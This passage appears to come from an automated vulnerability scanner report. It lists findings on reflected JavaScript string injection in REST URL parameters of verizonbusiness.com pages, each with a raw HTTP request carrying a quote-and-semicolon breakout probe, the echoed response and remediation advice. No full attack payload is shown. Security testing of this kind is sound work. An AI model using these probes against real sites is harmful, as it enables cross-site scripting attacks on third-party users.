<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it9f31c';407bf66b4dc/cloud-it/caas/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.93. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60ca5'%3b7c3a77074a8 was submitted in the REST URL parameter 3. This input was echoed as 60ca5';7c3a77074a8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it60ca5'%3b7c3a77074a8/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:25 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42315
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it60ca5';7c3a77074a8/caas/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.94. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c0b7"%3bdf82540c12d was submitted in the REST URL parameter 3. This input was echoed as 1c0b7";df82540c12d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it1c0b7"%3bdf82540c12d/caas/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:58 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 42315
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it1c0b7";df82540c12d/caas/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.95. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72e33"%3b7d02c3db74 was submitted in the REST URL parameter 4. This input was echoed as 72e33";7d02c3db74 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/caas72e33"%3b7d02c3db74/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43383
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it/caas72e33";7d02c3db74/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.96. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99f78'%3b6b00ceb6d39 was submitted in the REST URL parameter 4. This input was echoed as 99f78';6b00ceb6d39 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/caas99f78'%3b6b00ceb6d39/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43385
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it/caas99f78';6b00ceb6d39/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.97. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3824a'%3b2a6b6aee905 was submitted in the REST URL parameter 1. This input was echoed as 3824a';2a6b6aee905 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3824a'%3b2a6b6aee905/it/cloud-it/caas/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:50 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products3824a';2a6b6aee905/it/cloud-it/caas/security.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.98. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 755cc"%3b5f01b832dac was submitted in the REST URL parameter 1. This input was echoed as 755cc";5f01b832dac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products755cc"%3b5f01b832dac/it/cloud-it/caas/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products755cc";5f01b832dac/it/cloud-it/caas/security.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.99. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65e32"%3bdf1c926363f was submitted in the REST URL parameter 2. This input was echoed as 65e32";df1c926363f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it65e32"%3bdf1c926363f/cloud-it/caas/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it65e32";df1c926363f/cloud-it/caas/security.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.100. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cf9d'%3b53551aa3e11 was submitted in the REST URL parameter 2. This input was echoed as 8cf9d';53551aa3e11 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it8cf9d'%3b53551aa3e11/cloud-it/caas/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42323
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/it8cf9d';53551aa3e11/cloud-it/caas/security.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.101. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5958'%3bb453e0a2edf was submitted in the REST URL parameter 3. This input was echoed as a5958';b453e0a2edf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-ita5958'%3bb453e0a2edf/caas/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:37 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-ita5958';b453e0a2edf/caas/security.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.102. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f15e"%3b3018bdfda75 was submitted in the REST URL parameter 3. This input was echoed as 4f15e";3018bdfda75 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it4f15e"%3b3018bdfda75/caas/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it4f15e";3018bdfda75/caas/security.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.103. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29aec'%3b425ce2e213b was submitted in the REST URL parameter 4. This input was echoed as 29aec';425ce2e213b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/caas29aec'%3b425ce2e213b/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:02 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 42871
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/cloud-it/caas29aec';425ce2e213b/security.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.104. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c59"%3b42e0fe965dd was submitted in the REST URL parameter 4. This input was echoed as 51c59";42e0fe965dd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/caas51c59"%3b42e0fe965dd/security.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42871
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/cloud-it/caas51c59";42e0fe965dd/security.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT F
...[SNIP]...

1.105. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/cloud-it/caas/security.xml

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c375e"%3bc1272064ae was submitted in the REST URL parameter 5. This input was echoed as c375e";c1272064ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/cloud-it/caas/security.xmlc375e"%3bc1272064ae HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
